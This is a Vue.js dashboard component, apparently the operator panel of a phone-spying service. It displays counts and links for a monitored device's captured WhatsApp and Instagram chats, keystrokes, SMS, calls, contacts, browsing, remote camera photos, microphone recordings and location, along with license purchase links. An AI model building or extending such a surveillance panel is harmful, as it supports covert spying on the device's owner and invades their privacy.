<template>
  <div id="dashboard-analytics">
    <div class="flex flex-wrap mb-6">
      <vx-card class="w-full mb-6">
        <swiper :options="swiperOption">
          <swiper-slide v-for="banner in banners" :key="banner.id" v-html="banner.content"></swiper-slide>
          <div class="swiper-pagination swiper-pagination-white" slot="pagination"></div>
        </swiper>
      </vx-card>

      <div class="w-full">
        <div class="vx-row">
          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4" :class="{'bg-success': dispositivo.count.messenger > 0, 'bg-secondary': (dispositivo.count.messenger <= 0 || isNaN(dispositivo.count.messenger))}">
              <div slot="no-body">
                <router-link to="/mobile/whatsapp-chat">
                  <div class="p-6 flex justify-between flex-row-reverse items-center">
                    <span
                        class="p-3 inline-flex rounded-full feather-icon select-none relative text-success mb-4"
                        style="background: rgba(var(--vs-success), 0.15)"
                    >
                      <i class="fab fa-whatsapp fa-fw fa-2x"></i>
                    </span>
                    <div class="truncate">
                      <h2 class="mb-1 font-bold" v-if="dispositivo.panel_version == 0">
                        {{ dispositivo.count.messenger || '--' }}
                      </h2>
                      <h2 class="mb-1 font-bold" v-else>
                        {{ dispositivo.count.whatsapp || '--' }}
                      </h2>
                      <span> {{ $t("Chats") }} </span>
                    </div>
                  </div>
                </router-link>
                <LinkSuporte v-if="!dispositivo.permission.accessibility"></LinkSuporte>
              </div>
            </vx-card>
          </div>

          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4" :class="{'bg-success': dispositivo.count.messengeraudio > 0, 'bg-secondary': (dispositivo.count.messengeraudio <= 0 || isNaN(dispositivo.count.messengeraudio))}">
              <div slot="no-body">
                <router-link to="/mobile/whatsapp-audio">
                  <div class="p-6 flex justify-between flex-row-reverse items-center">
                    <span
                        class="p-3 inline-flex rounded-full feather-icon select-none relative text-success mb-4"
                        style="background: rgba(var(--vs-success), 0.15)"
                    >
                      <i class="fab fa-whatsapp fa-fw fa-2x"></i>
                    </span>
                    <div class="truncate">
                      <h2 class="mb-1 font-bold" v-if="dispositivo.panel_version == 0">
                        {{ dispositivo.count.messengeraudio || '--' }}
                      </h2>
                      <h2 class="mb-1 font-bold" v-else>
                        {{ dispositivo.count.whatsappaudio || '--' }}
                      </h2>
                      <span> {{ $t("Audios") }} </span>
                    </div>
                  </div>
                </router-link>
                <LinkSuporte v-if="!dispositivo.permission.files"></LinkSuporte>
              </div>
            </vx-card>
          </div>

          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4" :class="{'bg-success': dispositivo.count.location > 0, 'bg-secondary': (dispositivo.count.location <= 0 || isNaN(dispositivo.count.location))}">
              <div slot="no-body">
                <router-link to="/mobile/localizacao">
                  <div class="p-6 flex justify-between flex-row-reverse items-center">
                    <span
                        class="p-3 inline-flex rounded-full feather-icon select-none relative text-primary mb-4"
                        style="background: rgba(var(--vs-primary), 0.15)"
                    >
                      <i class="fas fa-location-arrow fa-fw fa-2x"></i>
                    </span>
                    <div class="truncate">
                      <h2 class="mb-1 font-bold">
                        {{ dispositivo.count.location || '--' }}
                      </h2>
                      <span> {{ $t("Location") }} </span>
                    </div>
                  </div>
                </router-link>
                <LinkSuporte v-if="!dispositivo.permission.location"></LinkSuporte>
              </div>
            </vx-card>
          </div>

          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4" :class="{'bg-success': dispositivo.count.call > 0, 'bg-secondary': (dispositivo.count.call <= 0 || isNaN(dispositivo.count.call))}">
              <div slot="no-body">
                <router-link to="/mobile/chamadas">
                  <div class="p-6 flex justify-between flex-row-reverse items-center">
                    <span
                        class="p-3 inline-flex rounded-full feather-icon select-none relative text-warning mb-4"
                        style="background: rgba(var(--vs-warning), 0.15)"
                    >
                      <i class="fas fa-phone-alt fa-fw fa-2x"></i>
                    </span>
                    <div class="truncate">
                      <h2 class="mb-1 font-bold">
                        {{ dispositivo.count.call || '--' }}
                      </h2>
                      <span> {{ $t("Calls") }} </span>
                    </div>
                  </div>
                </router-link>
                <LinkSuporte v-if="!dispositivo.permission.calls"></LinkSuporte>
              </div>
            </vx-card>
          </div>

          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4" :class="{'bg-success': dispositivo.count.instagram_chats > 0, 'bg-secondary': (dispositivo.count.instagram_chats <= 0 || isNaN(dispositivo.count.instagram_chats))}">
              <div slot="no-body">
                <router-link to="/mobile/instagram-chat">
                  <div class="p-6 flex justify-between flex-row-reverse items-center">
                    <span
                        class="p-3 inline-flex rounded-full feather-icon select-none relative text-dark mb-4"
                        style="background: rgba(var(--vs-dark), 0.15)"
                    >
                      <i class="fab fa-instagram fa-fw fa-2x"></i>
                    </span>
                    <div class="truncate">
                      <h2 class="mb-1 font-bold">
                        {{ dispositivo.count.instagram_chats || '--' }}
                      </h2>
                      <span>{{ $t("Instagram") }}</span>
                    </div>
                  </div>
                </router-link>
                <LinkSuporte v-if="!dispositivo.permission.accessibility"></LinkSuporte>
              </div>
            </vx-card>
          </div>

          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4" :class="{'bg-success': dispositivo.count.keylogger > 0, 'bg-secondary': (dispositivo.count.keylogger <= 0 || isNaN(dispositivo.count.keylogger))}">
              <div slot="no-body">
                <router-link to="/mobile/teclas">
                  <div class="p-6 flex justify-between flex-row-reverse items-center">
                    <span
                        class="p-3 inline-flex rounded-full feather-icon select-none relative text-danger mb-4"
                        style="background: rgba(var(--vs-danger), 0.15)"
                    >
                      <i class="fas fa-keyboard fa-fw fa-2x"></i>
                    </span>
                    <div class="truncate">
                      <h2 class="mb-1 font-bold">
                        {{ dispositivo.count.keylogger || '--' }}
                      </h2>
                      <span> {{ $t("Keys") }} </span>
                    </div>
                  </div>
                </router-link>
                <LinkSuporte v-if="!dispositivo.permission.accessibility"></LinkSuporte>
              </div>
            </vx-card>
          </div>

          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4" :class="{'bg-success': dispositivo.count.webhistory > 0, 'bg-secondary': (dispositivo.count.webhistory <= 0 || isNaN(dispositivo.count.webhistory))}">
              <div slot="no-body">
                <router-link to="/mobile/sites">
                  <div class="p-6 flex justify-between flex-row-reverse items-center">
                    <span
                        class="p-3 inline-flex rounded-full feather-icon select-none relative text-success mb-4"
                        style="background: rgba(var(--vs-success), 0.15)"
                    >
                      <i class="fas fa-browser fa-fw fa-2x"></i>
                    </span>
                    <div class="truncate">
                      <h2 class="mb-1 font-bold">
                        {{ dispositivo.count.webhistory || '--' }}
                      </h2>
                      <span> {{ $t("Websites") }} </span>
                    </div>
                  </div>
                </router-link>
                <LinkSuporte v-if="!dispositivo.permission.accessibility"></LinkSuporte>
              </div>
            </vx-card>
          </div>

          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4" :class="{'bg-success': dispositivo.count.sms > 0, 'bg-secondary': (dispositivo.count.sms <= 0 || isNaN(dispositivo.count.sms))}">
              <div slot="no-body">
                <router-link to="/mobile/sms-chat">
                  <div class="p-6 flex justify-between flex-row-reverse items-center">
                    <span
                        class="p-3 inline-flex rounded-full feather-icon select-none relative text-primary mb-4"
                        style="background: rgba(var(--vs-primary), 0.15)"
                    >
                      <i class="fas fa-sms fa-fw fa-2x"></i>
                    </span>
                    <div class="truncate">
                      <h2 class="mb-1 font-bold">
                        {{ dispositivo.count.sms || '--' }}
                      </h2>
                      <span>{{ $t("SMS") }}</span>
                    </div>
                  </div>
                </router-link>
                <LinkSuporte v-if="!dispositivo.permission.sms"></LinkSuporte>
              </div>
            </vx-card>
          </div>

          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4" :class="{'bg-success': dispositivo.count.contact > 0, 'bg-secondary': (dispositivo.count.contact <= 0 || isNaN(dispositivo.count.contact))}">
              <div slot="no-body">
                <router-link to="/mobile/contatos">
                  <div class="p-6 flex justify-between flex-row-reverse items-center">
                    <span
                        class="p-3 inline-flex rounded-full feather-icon select-none relative text-warning mb-4"
                        style="background: rgba(var(--vs-warning), 0.15)"
                    >
                      <i class="fas fa-address-card fa-fw fa-2x"></i>
                    </span>
                    <div class="truncate">
                      <h2 class="mb-1 font-bold">
                        {{ dispositivo.count.contact || '--' }}
                      </h2>
                      <span>{{ $t("Contacts") }}</span>
                    </div>
                  </div>
                </router-link>
                <LinkSuporte v-if="!dispositivo.permission.contacts"></LinkSuporte>
              </div>
            </vx-card>
          </div>

          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4" :class="{'bg-success': dispositivo.count.websearch > 0, 'bg-secondary': (dispositivo.count.websearch <= 0 || isNaN(dispositivo.count.websearch))}">
              <div slot="no-body">
                <router-link to="/mobile/pesquisas">
                  <div class="p-6 flex justify-between flex-row-reverse items-center">
                    <span
                        class="p-3 inline-flex rounded-full feather-icon select-none relative text-dark mb-4"
                        style="background: rgba(var(--vs-dark), 0.15)"
                    >
                      <i class="fas fa-search fa-fw fa-2x"></i>
                    </span>
                    <div class="truncate">
                      <h2 class="mb-1 font-bold">
                        {{ dispositivo.count.websearch || '--' }}
                      </h2>
                      <span>{{ $t("WebSearch") }}</span>
                    </div>
                  </div>
                </router-link>
                <LinkSuporte v-if="!dispositivo.permission.accessibility"></LinkSuporte>
              </div>
            </vx-card>
          </div>

          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4" :class="{'bg-success': dispositivo.count.remotephoto > 0, 'bg-secondary': (dispositivo.count.remotephoto <= 0 || isNaN(dispositivo.count.remotephoto))}">
              <div slot="no-body">
                <router-link to="/mobile/foto-remota">
                  <div class="p-6 flex justify-between flex-row-reverse items-center">
                    <span
                        class="p-3 inline-flex rounded-full feather-icon select-none relative text-danger mb-4"
                        style="background: rgba(var(--vs-danger), 0.15)"
                    >
                      <i class="fas fa-camera-retro fa-fw fa-2x"></i>
                    </span>
                    <div class="truncate">
                      <h2 class="mb-1 font-bold">
                        {{ dispositivo.count.remotephoto || '--' }}
                      </h2>
                      <span> {{ $t("PhotoRemote") }} </span>
                    </div>
                  </div>
                </router-link>
                <LinkSuporte v-if="!dispositivo.permission.remotephoto"></LinkSuporte>
              </div>
            </vx-card>
          </div>

          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4" :class="{'bg-success': dispositivo.count.microphone > 0, 'bg-secondary': (dispositivo.count.microphone <= 0 || isNaN(dispositivo.count.microphone))}">
              <div slot="no-body">
                <router-link to="/mobile/microfone">
                  <div class="p-6 flex justify-between flex-row-reverse items-center">
                    <span
                        class="p-3 inline-flex rounded-full feather-icon select-none relative text-success mb-4"
                        style="background: rgba(var(--vs-success), 0.15)"
                    >
                      <i class="fas fa-microphone fa-fw fa-2x"></i>
                    </span>
                    <div class="truncate">
                      <h2 class="mb-1 font-bold">
                        {{ dispositivo.count.microphone || '--' }}
                      </h2>
                      <span>{{ $t("Microphone") }}</span>
                    </div>
                  </div>
                </router-link>
                <LinkSuporte v-if="!dispositivo.permission.microphone"></LinkSuporte>
              </div>
            </vx-card>
          </div>

          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4" :class="{'bg-success': dispositivo.count.photogallery > 0, 'bg-secondary': (dispositivo.count.photogallery <= 0 || isNaN(dispositivo.count.photogallery))}">
              <div slot="no-body">
                <router-link to="/mobile/photogallery">
                  <div class="p-6 flex justify-between flex-row-reverse items-center">
                    <span
                        class="p-3 inline-flex rounded-full feather-icon select-none relative text-primary mb-4"
                        style="background: rgba(var(--vs-primary), 0.15)"
                    >
                      <i class="fas fa-camera fa-fw fa-2x"></i>
                    </span>
                    <div class="truncate">
                      <h2 class="mb-1 font-bold">
                        {{ dispositivo.count.photogallery || '--' }}
                      </h2>
                      <span> {{ $t("PhotoGallery") }} </span>
                    </div>
                  </div>
                </router-link>
                <LinkSuporte v-if="!dispositivo.permission.files"></LinkSuporte>
              </div>
            </vx-card>
          </div>

          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4">
              <div slot="no-body">
                <div class="p-6 flex justify-between flex-row-reverse items-center">
                  <span
                      class="p-3 inline-flex rounded-full feather-icon select-none relative text-warning mb-4"
                      style="background: rgba(var(--vs-warning), 0.15)"
                  >
                    <i class="fas fa-battery-three-quarters fa-fw fa-2x"></i>
                  </span>
                  <div class="truncate">
                    <h2 class="mb-1 font-bold">
                      {{ dispositivo.battery || '--' }}
                    </h2>
                    <span>{{ $t("Battery") }}</span>
                  </div>
                </div>
              </div>
            </vx-card>
          </div>

          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4">
              <div slot="no-body">
                <div class="p-6 flex justify-between flex-row-reverse items-center">
                  <span
                      class="p-3 inline-flex rounded-full feather-icon select-none relative text-dark mb-4"
                      style="background: rgba(var(--vs-dark), 0.15)"
                  >
                    <i class="fas fa-wifi fa-fw fa-2x"></i>
                  </span>
                  <div class="truncate">
                    <h2 class="mb-1 font-bold">
                      {{ dispositivo.network || '--' }}
                    </h2>
                    <span> {{ $t("Connection") }} </span>
                  </div>
                </div>
              </div>
            </vx-card>
          </div>

          <div class="vx-col w-1/2 md:w-1/4 lg:w-1/4">
            <vx-card class="overflow-hidden mb-4">
              <div slot="no-body">
                <div class="p-6 flex justify-between flex-row-reverse items-center">
                  <span
                      class="p-3 inline-flex rounded-full feather-icon select-none relative text-primary mb-4"
                      style="background: rgba(var(--vs-primary), 0.15)"
                  >
                    <i class="fas fa-mobile-alt fa-fw fa-2x"></i>
                  </span>
                  
                  <div class="truncate">
                    <h2 class="mb-1 font-bold text-success">
                      {{ dispositivo.apkversion || '--' }}
                    </h2>
                    <span> {{ $t("UpdatedVersion") }} </span>
                  </div>
                </div>
              </div>
            </vx-card>
          </div>
        </div>
      </div>
    </div>

    <div class="vx-row" v-if="dispositivo.can_switch_panel == 1">
      <div class="vx-col w-full mb-base">
        <vx-card class="p-4 md:p-0">
          <div>
            <div>
              Você está visualizando dados da versão <strong v-if="dispositivo.panel_version == 0">antiga</strong>
              <strong v-else>nova</strong>
              deste dispositivo.<br /><br />Caso não consiga visualizar os dados do aparelho, clique no botão abaixo
              para alternar a versão do painel.<br />Não se preocupe, você poderá alternar entre versões sempre que
              precisar sem perder nenhum dado.
            </div>

            <div class="mt-4">
              <vs-button color="primary" @click="switchPanelVersion()" v-if="dispositivo.panel_version == 0"
              >Visualizar Dados da Versão Nova
              </vs-button
              >
              <vs-button color="warning" @click="switchPanelVersion()" v-else>Visualizar Dados da Versão Antiga</vs-button>
            </div>
          </div>
        </vx-card>
      </div>
    </div>

    <div class="vx-row">
      <div class="vx-col w-full md:w-1/2 lg:w-1/2 xl:w-1/2 mb-base">
        <vx-card class>
          <h4 class="mb-4"> {{ $t("DataOf") }} {{ dispositivo.alias || dispositivo.device }}</h4>
          <ul class="page-suggestions-list">
            <!-- update -->
            <li class="page-suggestion flex items-center mb-4">
              <div class="mr-3">
                <i class="fas fa-sync-alt fa-fw fa-2x"></i>
              </div>
              <div class="leading-tight">
                <p class="font-medium"> {{ $t("LastUpdate") }} </p>
                <span class="text-xs">&nbsp;</span>
              </div>
              <div class="ml-auto">
                <div class="flex">
                  <div>
                    <small>{{ dispositivo.updated_at | formatDateTime }}</small
                    >&nbsp;
                    <i class="fas fa-sync-alt"></i>
                  </div>
                </div>
              </div>
            </li>

            <!-- dados de conexão -->
            <li class="page-suggestion flex items-center mb-4">
              <div class="mr-3">
                <i class="fas fa-wifi fa-fw fa-2x"></i>
              </div>
              <div class="leading-tight">
                <p class="font-medium">{{ $t("Connection") }}</p>
                <span class="text-xs">&nbsp;</span>
              </div>
              <div class="ml-auto">
                <div class="flex">
                  <div v-if="dispositivo.network == 'WIFI'">
                    <small>{{ dispositivo.network }}</small
                    >&nbsp;
                    <i class="fas fa-wifi"></i>
                  </div>
                  <div v-else>
                    <small>{{ dispositivo.network }}</small
                    >&nbsp;
                    <i class="fas fa-arrow-up"></i>
                  </div>
                </div>
              </div>
            </li>

            <!-- dados de GPS -->
            <li class="page-suggestion flex items-center mb-4">
              <div class="mr-3">
                <i class="fas fa-location-arrow fa-fw fa-2x"></i>
              </div>
              <div class="leading-tight">
                <p class="font-medium">{{ $t("Location") }}</p>
                <span class="text-xs">&nbsp;</span>
              </div>
              <div class="ml-auto">
                <div class="flex">
                  <div v-show="dispositivo.gps == 1">
                    <small> {{ $t("Active") }} </small>&nbsp;
                    <i class="fas fa-location-arrow text-success"></i>
                  </div>
                  <div v-show="dispositivo.gps == 0">
                    <small> {{ $t("Inactive") }} </small>&nbsp;
                    <i class="fas fa-location-arrow text-danger"></i>
                  </div>
                </div>
              </div>
            </li>

            <!-- dados de Bateria -->
            <li class="page-suggestion flex items-center mb-4">
              <div class="mr-3">
                <i class="fas fa-battery-three-quarters fa-fw fa-2x"></i>
              </div>
              <div class="leading-tight">
                <p class="font-medium">{{ $t("Battery") }}</p>
                <span class="text-xs">&nbsp;</span>
              </div>
              <div class="ml-auto">
                <div class="flex">
                  <div>
                    <small>{{ dispositivo.battery }}%</small>&nbsp;
                    <i class="fas fa-battery-three-quarters"></i>
                  </div>
                </div>
              </div>
            </li>

            <!-- dados do wifi -->
            <li class="page-suggestion flex items-center mb-4" v-if="dispositivo.wifi_ssid != 0">
              <div class="mr-3">
                <i class="fas fa-wifi fa-fw fa-2x"></i>
              </div>
              <div class="leading-tight">
                <p class="font-medium"> {{ $t("WifiNetwork") }} </p>
                <span class="text-xs"> {{ $t("WifiName") }} </span>
              </div>
              <div class="ml-auto">
                <div class="flex">
                  <div>
                    <small>{{ dispositivo.wifi_ssid }}</small
                    >&nbsp;
                    <i class="fas fa-wifi"></i>
                  </div>
                </div>
              </div>
            </li>

            <!-- dados de Numero -->
            <li class="page-suggestion flex items-center mb-4" v-if="dispositivo.phone != 'unknown'">
              <div class="mr-3">
                <i class="fas fa-phone-volume fa-fw fa-2x"></i>
              </div>
              <div class="leading-tight">
                <p class="font-medium"> {{ $t("Number") }} </p>
                <span class="text-xs">&nbsp;</span>
              </div>
              <div class="ml-auto">
                <div class="flex">
                  <div>
                    <small>{{ dispositivo.phone }}</small
                    >&nbsp;
                    <i class="fas fa-phone-volume"></i>
                  </div>
                </div>
              </div>
            </li>

            <!-- dados de Operadora -->
            <li class="page-suggestion flex items-center mb-4" v-if="dispositivo.provider != 'unknown'">
              <div class="mr-3">
                <i class="fas fa-broadcast-tower fa-fw fa-2x"></i>
              </div>
              <div class="leading-tight">
                <p class="font-medium"> {{ $t("Provider") }} </p>
                <span class="text-xs">&nbsp;</span>
              </div>
              <div class="ml-auto">
                <div class="flex">
                  <div>
                    <small>{{ dispositivo.provider }}</small
                    >&nbsp;
                    <i class="fas fa-broadcast-tower"></i>
                  </div>
                </div>
              </div>
            </li>

            <!-- dados de Licença -->
            <li class="page-suggestion flex items-center mb-4">
              <div class="mr-3">
                <i class="fas fa-user fa-2x text-primary" v-if="dispositivo.licence.until"></i>
                <i
                    class="fas fa-location-arrow fa-2x text-warning"
                    v-if="dispositivo.uid && dispositivo.licence.until === null"
                ></i>
              </div>
              <div class="leading-tight">
                <p class="font-medium">{{ $t("License") }}</p>
                <span class="text-xs" v-if="dispositivo.licence.until"
                >{{ $t("License") }} {{ dispositivo.licence.until | formatDate }}</span
                >
                <span class="text-xs" v-if="dispositivo.uid && dispositivo.licence.until === null"
                > {{ $t("TxtPayment") }} </span
                >
              </div>
              <div class="ml-auto">
                <div class="flex">
                  <div class v-if="dispositivo.licence.until">
                    <router-link :to="`/planos/mobile/${dispositivo.uid}/1`">
                      <span class="flex bg-primary rounded p-2 text-white">
                        <feather-icon icon="UserPlusIcon" svgClasses="w-4 h-4"></feather-icon> {{ $t("Extend") }}
                      </span>
                    </router-link>
                  </div>
                  <div class v-if="dispositivo.uid && dispositivo.licence.until === null">
                    <router-link :to="`/planos/mobile/${dispositivo.uid}/1`">
                      <span class="flex bg-warning rounded p-2 text-white">
                        <feather-icon icon="UserPlusIcon" svgClasses="w-4 h-4"></feather-icon> {{ $t("Purchase") }}
                      </span>
                    </router-link>
                  </div>
                </div>
              </div>
            </li>
          </ul>
        </vx-card>
      </div>

      <div class="vx-col w-full md:w-1/2 mb-base">
        <leaflet-map :dispositivo="dispositivo"></leaflet-map>
      </div>
    </div>
  </div>
</template>

<script>
import 'swiper/dist/css/swiper.min.css';
import {swiper, swiperSlide} from 'vue-awesome-swiper';
import LinkSuporte from "@/views/components/LinkSuporte.vue";

const LeafletMap = () => import('@/components/Map.vue');

export default {
  data() {
    return {
      appSuporteNovaVersao: process.env.VUE_APP_SUPORTE_NOVA_VERSAO,
      appDownloadMobileBit: process.env.VUE_APP_DOWNLOAD_MOBILE_BIT,

      banners: [],

      dispositivo: {
        count: {
          messenger: '-',
          location: '-',
          call: '-',
          instagram_chats: '-',
          keylogger: '-',
        },
        permission: {
          accessibility: true,
          files: true,
          location: true,
          calls: true,
          sms: true,
          contacts: true,
          remotephoto: true,
          microphone: true,
        },
        licence: {
          until: null,
        },
      },
      swiperOption: {
        spaceBetween: 30,
        centeredSlides: true,
        autoplay: {
          delay: 10000,
          disableOnInteraction: false,
        },
        pagination: {
          el: '.swiper-pagination',
          clickable: true,
        },
        navigation: {
          nextEl: '.swiper-button-next',
          prevEl: '.swiper-button-prev',
        },
      },

    };

  },
  count: 0,
  components: {
    LinkSuporte,
    swiper,
    swiperSlide,
    LeafletMap,
  },
  methods: {
    load: function () {
      const mobile = JSON.parse(this.$localStorage.get('mobile'));

      this.$api
        .get(`/api/v1/banners/mobile/${mobile.plan_id}`)
        .then((response) => {
          this.banners = response.data;
        })
        .catch(() => {
        });

      this.$api
        .get(`/api/v${mobile.panel_version}/mobile/device/${this.$localStorage.get('uid')}`)
        .then((response) => {
          this.dispositivo = response.data.data;
          this.$EventBus.$emit('deviceChanged', this.dispositivo);
        })
        .catch((error) => {
          this.$vs.notify({
            time: 6000,
            title: 'Aviso',
            text: error.response.data.error || error.response.data.message,
            iconPack: 'feather',
            icon: 'icon-alert-circle',
            color: 'danger',
          });
        });
    },
    showSidebar() {
      this.$store.commit('TOGGLE_IS_SIDEBAR_ACTIVE', true);
    },
    switchPanelVersion() {
      const mobile = JSON.parse(this.$localStorage.get('mobile'));
      this.$api
        .post(`/api/v${mobile.panel_version}/mobile/switchPanelVersion/${this.$localStorage.get('uid')}`)
        .then((response) => {
          this.$localStorage.set('mobile', JSON.stringify(response.data.data));
          window.location.reload();
        });
    },
  },
  mounted: function () {
    this.load();
  },
};
</script>

<style lang="scss">
#dashboard-analytics {
  .greet-user {
    position: relative;

    .decore-left {
      position: absolute;
      left: 0;
      top: 0;
    }

    .decore-right {
      position: absolute;
      right: 0;
      top: 0;
    }
  }

  .swiper-slide {
    font-size: 18px;
    color: #fff;
    -webkit-box-sizing: border-box;
    box-sizing: border-box;
    background-color: transparent !important;
    justify-content: space-around !important;
  }

  .swiper-slide .title {
    font-size: 41px;
    font-weight: 300;
  }

  .swiper-slide .subtitle {
    font-size: 21px;
  }

  .swiper-slide .text {
    font-size: 14px;
    max-width: 400px;
    line-height: 1.3;
  }

  .nova-versao {
    background: linear-gradient(120deg, rgba(41, 204, 160, 0.5));
    color: rgb(255, 255, 255);
  }

  .whatsapp-amigo {
    background: linear-gradient(120deg, rgba(41, 204, 160, 0.5), rgba(10, 88, 74, 0.8)),
    url(../assets/images/elements/fundo-whats.jpg);
    color: rgb(255, 255, 255);
  }

  .youtube-curtir {
    background: linear-gradient(120deg, rgba(238, 76, 76, 0.5), rgba(221, 7, 7, 0.8)),
    url(../assets/images/elements/fundo-youtube.jpg);
    background-size: cover;
    color: rgb(255, 255, 255);
  }

  .plano-vip {
    background: url(../assets/images/elements/191.jpg);
    color: rgb(255, 255, 255);
  }

  .info {
    background: rgb(17, 16, 16);
  }

  .saldos {
    background: linear-gradient(120deg, rgba(146, 47, 232, 0.5), rgb(96, 24, 169)),
    url(../assets/images/elements/bg-saldo.jpg);
    color: rgb(255, 255, 255);
  }

  .question {
    background: linear-gradient(120deg, rgba(255, 241, 230, 0.5), rgb(41, 106, 195)),
    url(../assets/images/elements/question.jpg);
    background-size: cover;
    color: #103161;
  }

  .h {
    height: 160px;
  }

  @media (max-width: 576px) {
    .decore-left,
    .decore-right {
      width: 140px;
    }
    .pr-2 {
      padding-right: 1rem !important;
    }
    .ptm-2 {
      padding-top: 1rem !important;
    }
    .pr-4 {
      padding-right: 0rem !important;

      .h {
        height: auto;
      }
    }
  }

  @media (min-width: 576px) {
    .prc-2 {
      padding-right: 1rem !important;
    }
    .plc-2 {
      padding-left: 1rem !important;
    }

    .prco-4 {
      padding-right: 1rem !important;
    }
  }
}

.bg-success {
  background-color: rgba(227, 211, 255, 0.5) !important;
}
</style>
